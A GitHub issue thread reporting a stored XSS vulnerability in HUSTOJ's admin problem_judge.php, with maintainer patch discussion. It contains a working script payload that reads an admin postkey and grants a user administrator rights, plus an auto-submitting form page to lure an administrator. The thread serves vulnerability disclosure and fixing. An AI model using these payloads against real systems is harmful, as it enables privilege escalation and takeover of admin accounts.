### ISSUE TITLE
XSS Vulnerability in /admin/problem_judge.php

### ISSUE THREAD

**Issue by rolemee** [zhblue/hustoj#866]
**描述问题**
XSS Vulnerability exists in
https://github.com/zhblue/hustoj/blob/417173dd9b4606251e06e1b9a2e6992db58831a8/trunk/web/admin/problem_judge.php#L138
**如何复现**
1. POST text with xss script to submit.php
for example:
```html
id=-1000&language=1&source=asdasdasdasdasd&input_text=<script src="/template/bs3/jquery.min.js"></script><script>$.get("/admin/privilege_add.php").done(function(data){
    re=/name="postkey" value="([\w]%2B?)"/g;
    $.post("/admin/privilege_add.php",{"postkey":re.exec(data)[1],"user_id":"username","rightstr":"administrator","valuestr":"true"
                                  ,"do":"do","do":"do","csrf":"tV8EG8W5AsFY0JCKoBStoHC2v30NrDe5"}).done(function (data) {console.log(data)})
})
</script>
```
Then you can get a sid.
![image](https://user-images.githubusercontent.com/80891898/192952908-f04f3fc4-5b47-4b32-b0ef-1394d1776cf8.png)

2. Send malicious links to administrators
example:
```html
<body>
<script type="text/javascript">
    function post(URL, PARAMS) {
    var temp = document.createElement("form");
    temp.action = URL;
    temp.method = "post";
    temp.style.display = "none";
    for (var x in PARAMS) {
        var opt = document.createElement("textarea");
        opt.name = x;
        opt.value = PARAMS[x];
        temp.appendChild(opt);
    }
    document.body.appendChild(temp);
    temp.submit();
    return temp;
}
post("http://192.168.0.25:8080/admin/problem_judge.php",{"sid":"1018","pid":"1000","result":"4","time":"500","memory":"1024","sim":"100","simid":"0","filename":"1000%2Ftest.in","gettestdatalist":"do","getcustominput":"1"})

</script>
</body>

```
![image](https://user-images.githubusercontent.com/80891898/192952743-f9332657-f0c8-44ee-bcbb-e46e806f8031.png)

**Comment by zhblue** [comment]
thank you very much for reporting this
will this patch work around ?
https://github.com/zhblue/hustoj/commit/c15d3700f32f840d50b0fa1024d983f03c4fd1d1

**Comment by rolemee** [comment]
Although repairing in this way can prevent xss, it will cause some business problems. I recommend repairing like #867

**Comment by zhblue** [comment]
no , this will not cause business problems , because these input should be treat as TEXT from the beginning .
only the HTTP_JUDGER will use it as a API port for downloading TEXT input for once only test running.

**Comment by zhblue** [comment]
Still, it's a marvelous work you've done !
Thank you very much for helping !

**Comment by rolemee** [comment]
I made a mistake, this change can defend xss。

**Comment by rolemee** [comment]
However, other files will also have xss vulnerabilities.
For example:
https://github.com/zhblue/hustoj/blob/ec618ac7de0f30d9431da63e096296a764affc2f/trunk/web/swadmin/problem_judge.php#L106-L113
https://github.com/zhblue/hustoj/blob/ec618ac7de0f30d9431da63e096296a764affc2f/trunk/web/swadmin/problem_judge.php#L115-L123

**Comment by rolemee** [comment]
@zhblue
